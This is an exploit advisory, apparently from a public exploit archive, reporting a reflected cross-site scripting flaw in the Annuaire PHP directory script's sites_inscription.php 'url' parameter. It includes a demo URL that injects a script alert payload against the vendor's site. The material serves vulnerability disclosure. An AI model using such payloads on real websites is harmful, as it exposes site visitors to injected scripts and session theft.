Annuaire PHP suffers from a cross site scripting vulnerability.
f48a2cdaf3284173923bc1fc1f0927333dfbb6605965f97016aa820c624bd3f0
############################################################################
# Exploit Title: Annuaire php
# Date: 16/01/2012
# Author: Atmon3r
# Discovered By: Atmon3r
# Software Link: http://www.annuairephp.com/
# Version: All Version
# Security Risk:: Low
# Tested on: GNU/Linux Ubuntu
############################################################################
# Exploit:
#
http://www.website.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]
#
############################################################################
# Demo:
#
http://www.annuairephp.com/referencement/sites_inscription.php?nom=xss&url="><script>alert(1)</script>
#
############################################################################